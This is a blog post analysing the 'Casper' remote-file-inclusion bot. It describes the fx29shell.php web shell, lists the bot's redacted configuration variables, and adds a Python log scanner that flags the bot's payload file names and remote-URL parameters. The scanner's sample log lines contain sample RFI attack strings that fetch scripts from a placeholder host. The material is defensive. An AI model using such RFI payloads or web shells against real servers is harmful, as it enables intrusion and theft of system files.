Irregular Expressions

Aug 22 2010   9:44PM GMT

Casper RFI crack bot – Part 5

Dan O'Connor

Some of the sh.txt script seems to be pretty old: it calls milw0rm and darkc0de, both sites that are no longer up and have not been for a while.

There are also a few things worth looking into here. The script mentions fx29shell.php, which is a PHP shell that can be loaded onto the system.

It can do all kinds of nasty things to your web server; you can download /etc/passwd for a start. Not good if you find this on your system. It might be a good time to do some Google searches against your domain (while we are talking about it).

So after all of this it looks like casper.(pl|txt) is the main thing doing all of the work, as you can tell from all of the variables.

$admin       = "XXXXX";
$serverircs  = array("");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";

In the next section we will take a closer look at casper now that we have poked around a bit.
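The file names in the variable list above, together with fx29shell.php, make usable indicators for checking your own web server logs. The following is an added example, not part of the original post or of the bot's code: it flags requests for those files and query parameters that carry a remote URL. The combined access log format, the function names classify and scan, and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# File names from the post: the bot's payload variables plus the PHP shell.
PAYLOAD_NAMES = {"sh.txt", "def.txt", "psy.tar.gz", "eggdrop.tar.gz",
                 "bot.txt", "iso.txt", "scan.txt", "fx29shell.php"}

# Assumption: Apache/nginx "combined" access log format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

SAMPLE_LOG = [  # constructed lines using documentation address ranges
    '192.0.2.10 - - [22/Aug/2010:21:40:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [22/Aug/2010:21:41:13 +0000] "GET /index.php?page=http://203.0.113.5/casper/sh.txt? HTTP/1.1" 200 312 "-" "-"',
    '198.51.100.7 - - [22/Aug/2010:21:41:20 +0000] "GET /view.php?inc=http%3A%2F%2F203.0.113.5%2Fx%2Fid.txt%3F HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.9 - - [22/Aug/2010:21:45:02 +0000] "GET /images/fx29shell.php HTTP/1.1" 200 18233 "-" "-"',
]


def classify(line):
    """Return None for an unremarkable line, else a dict describing the hit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # 1) Request for one of the files by name: it may already be on the server.
    basename = unquote(parts.path).rsplit("/", 1)[-1].lower()
    if basename in PAYLOAD_NAMES:
        kind = "payload-present" if m["status"] == "200" else "payload-probe"
        return {"ip": m["ip"], "kind": kind, "name": basename}
    # 2) Parameter whose value is a remote URL: a remote file inclusion attempt.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # undo a second layer of percent-encoding
        if REMOTE_RE.match(value):
            # Keep only the file name; drop any NUL byte or query string after it.
            name = urlsplit(value.split("\x00")[0]).path.rsplit("/", 1)[-1].lower()
            kind = "rfi-known-payload" if name in PAYLOAD_NAMES else "rfi-generic"
            return {"ip": m["ip"], "kind": kind, "name": name, "param": key}
    return None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "payload-present" hit (status 200 on one of the file names) deserves attention first, since it suggests the file is being served from your own web root.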
